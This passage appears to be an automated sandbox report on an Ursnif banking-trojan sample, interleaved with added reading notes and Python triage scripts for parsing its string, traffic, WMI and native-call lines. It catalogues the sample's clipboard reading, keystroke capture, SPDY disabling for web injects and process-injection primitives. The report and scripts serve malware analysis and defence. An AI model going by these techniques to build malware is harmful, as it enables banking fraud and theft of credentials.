Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xNzD?ver=aee5&quot;
Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xvsU?ver=77c4&quot;
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1blRDQ?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bmc4S?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=j
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001E.00000003.477391818.000000000E9DF000.00000004.00000040.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB10MkbM.img?h=16&w=16
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aWtIw.img?h=16&w=16
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ardZ3.img?h=16&w=16
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmp String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.437305714.0000000008B88000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000001E.00000000.437340795.0000000008BDA000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
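Reading note on the string and traffic lines above, with an added triage script (it is not part of the sandbox report). Almost every URL listed comes from an explorer.exe memory dump whose second field is 00000000, which this script treats as the snapshot taken when the process started, before the sample injected into it (that reading of the .sdmp name is an assumption, not something the report states). Those strings are the material that is always in explorer.exe on a stock image: Internet Explorer's built-in search-provider and favicon list, the IE8 Accelerator URLs, vendor URLs embedded in installed fonts, and MSN start-page content. The powershell.exe strings (contoso.com, nuget.org, Pester) are defaults from PowerShell's own modules. None of them were contacted by the sample and none belong in an IOC list. The network lines only give the local ephemeral port of each TLS session; each session appears twice, once per direction. The script parses both line types, drops hosts already present in a start-of-process snapshot, decodes HTML-entity residue such as `&amp;` and `&quot;`, and counts sessions by ephemeral port. The sample input is a constructed excerpt in the report's own line format.

```python
"""Triage helper for Joe Sandbox style 'String found in binary or memory' and
'Network traffic detected' lines.  Added example, not part of the report."""
import html
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed excerpt in the report's line format (two sources on one line is a
# shape the report also uses).
SAMPLE_REPORT = """\
Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000003.469432244.000000000E9E5000.00000004.00000040.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xNzD?ver=aee5&quot;
Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
"""

STRING_RE = re.compile(
    r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)$")
TRAFFIC_RE = re.compile(
    r"^Source: unknown Network traffic detected: HTTP traffic on port "
    r"(?P<src>\d+) -> (?P<dst>\d+)$")


def parse_sources(field):
    """'proc, dump, proc, dump' -> [(proc, dump), ...]."""
    parts = [p.strip() for p in field.split(",")]
    return list(zip(parts[0::2], parts[1::2]))


def dump_phase(dump):
    """Second dotted field of '<procidx>.<phase>.<id>.<base>.<prot>.<type>.sdmp'.
    Assumption: phase 0 is the snapshot taken at process start, i.e. before the
    sample had a chance to write into the process."""
    return int(dump.split(".")[1], 16)


def parse_report(text):
    strings, sessions = [], set()
    for line in text.splitlines():
        line = line.strip()
        m = STRING_RE.match(line)
        if m:
            url = html.unescape(m["url"])  # '&amp;', '&quot;' are HTML residue
            for proc, dump in parse_sources(m["sources"]):
                strings.append({"process": proc, "phase": dump_phase(dump),
                                "url": url, "host": urlsplit(url).hostname})
            continue
        m = TRAFFIC_RE.match(line)
        if m:
            # One TLS session shows up as '443 -> N' and 'N -> 443'; the
            # ephemeral port N identifies it.
            src, dst = int(m["src"]), int(m["dst"])
            sessions.add(src if dst == 443 else dst)
    return strings, sessions


def triage_hosts(strings):
    """Per host: was it already in a start-of-process snapshot (baseline) or
    did it only show up in a later dump (runtime), and in which processes."""
    seen = defaultdict(lambda: {"baseline": False, "runtime": False,
                                "processes": set()})
    for s in strings:
        entry = seen[s["host"]]
        entry["baseline" if s["phase"] == 0 else "runtime"] = True
        entry["processes"].add(s["process"])
    return seen


def runtime_only_hosts(strings):
    """Hosts never seen in a baseline snapshot: the ones worth a second look."""
    return sorted(h for h, e in triage_hosts(strings).items()
                  if e["runtime"] and not e["baseline"])


if __name__ == "__main__":
    found, tls = parse_report(SAMPLE_REPORT)
    print("runtime-only hosts:", runtime_only_hosts(found))
    print("TLS sessions by ephemeral port:", sorted(tls))
```

What survives the baseline filter still needs a look by hand: in the report above that is MSN image content in explorer.exe and PowerShell module defaults, not command-and-control. The Ursnif-specific indicators for this sample live in the configuration extracted under "Found malware configuration", not in these string dumps.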

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A81644 memcpy,memset,GetModuleHandleA,GetProcAddress,GetClipboardData,CloseHandle,FindCloseChangeNotification,CloseHandle,GetLastError,HeapFree, 1_2_04A81644
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.511370444.0000000000C2B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6968, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Drops certificate files (DER)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\183C.bin\Root.pfx Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\183C.bin\AuthRoot.pfx Jump to dropped file

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A864BF NtMapViewOfSection, 1_2_04A864BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A84093 GetProcAddress,NtCreateSection,memset, 1_2_04A84093
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A89E28 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_04A89E28
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A8B2CD NtQueryVirtualMemory, 1_2_04A8B2CD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493029D NtProtectVirtualMemory, 1_2_0493029D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493009C NtAllocateVirtualMemory, 1_2_0493009C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04930066 NtAllocateVirtualMemory, 1_2_04930066
Source: C:\Windows\System32\control.exe Code function: 31_2_006B88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 31_2_006B88E0
Source: C:\Windows\System32\control.exe Code function: 31_2_006B1920 NtReadVirtualMemory, 31_2_006B1920
Source: C:\Windows\System32\control.exe Code function: 31_2_006A6104 NtQueryInformationProcess, 31_2_006A6104
Source: C:\Windows\System32\control.exe Code function: 31_2_006A91C0 NtQueryInformationProcess, 31_2_006A91C0
Source: C:\Windows\System32\control.exe Code function: 31_2_006BA9D8 NtWriteVirtualMemory, 31_2_006BA9D8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BDE98 NtAllocateVirtualMemory, 31_2_006BDE98
Source: C:\Windows\System32\control.exe Code function: 31_2_006BD748 NtMapViewOfSection, 31_2_006BD748
Source: C:\Windows\System32\control.exe Code function: 31_2_006B7B34 NtCreateSection, 31_2_006B7B34
Source: C:\Windows\System32\control.exe Code function: 31_2_006BEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 31_2_006BEB10
Source: C:\Windows\System32\control.exe Code function: 31_2_006B67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 31_2_006B67C8
Source: C:\Windows\System32\control.exe Code function: 31_2_006D900A NtProtectVirtualMemory,NtProtectVirtualMemory, 31_2_006D900A
Source: C:\Windows\System32\control.exe Code function: 31_2_006D936C NtProtectVirtualMemory, 31_2_006D936C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FC91C0 NtQueryInformationProcess, 34_2_0000024E31FC91C0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FD88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_0000024E31FD88E0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_0000024E31FF900A NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_0000024E31FF900A
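Reading note on the two preceding lists (the StdRegProv calls and the native-function inventory), with an added script that is not part of the report. Two points a responder should take from them. First, the registry writes done through `IWbemServices::ExecMethod` on `StdRegProv` are carried out by the WMI provider host on the caller's behalf, so registry auditing that attributes writes to the calling process will show WmiPrvSE.exe rather than regsvr32.exe; the "WMI Registry write" lines are the same Set* calls as in the "WMI Queries" list, counted once more by the sandbox. Second, a list of Nt* imports is not by itself evidence of injection; what matters is whether one process holds both a payload-placement primitive (NtCreateSection plus NtMapViewOfSection, or NtAllocateVirtualMemory plus NtWriteVirtualMemory) and an execution primitive (CreateRemoteThread or NtSetContextThread). The groupings below are this example's own heuristic, not the sandbox's rules; the sample input is a constructed excerpt copied in the report's line format.

```python
"""Classify 'Code function' and 'WMI Queries' lines of a Joe Sandbox style
report into injection primitives and StdRegProv registry activity.
Added example, not part of the report; the groupings are heuristics."""
import re
from collections import defaultdict

# Constructed excerpt in the report's line format.
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A864BF NtMapViewOfSection, 1_2_04A864BF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A84093 GetProcAddress,NtCreateSection,memset, 1_2_04A84093
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_0493029D NtProtectVirtualMemory, 1_2_0493029D
Source: C:\Windows\System32\control.exe Code function: 31_2_006BA9D8 NtWriteVirtualMemory, 31_2_006BA9D8
Source: C:\Windows\System32\control.exe Code function: 31_2_006BDE98 NtAllocateVirtualMemory, 31_2_006BDE98
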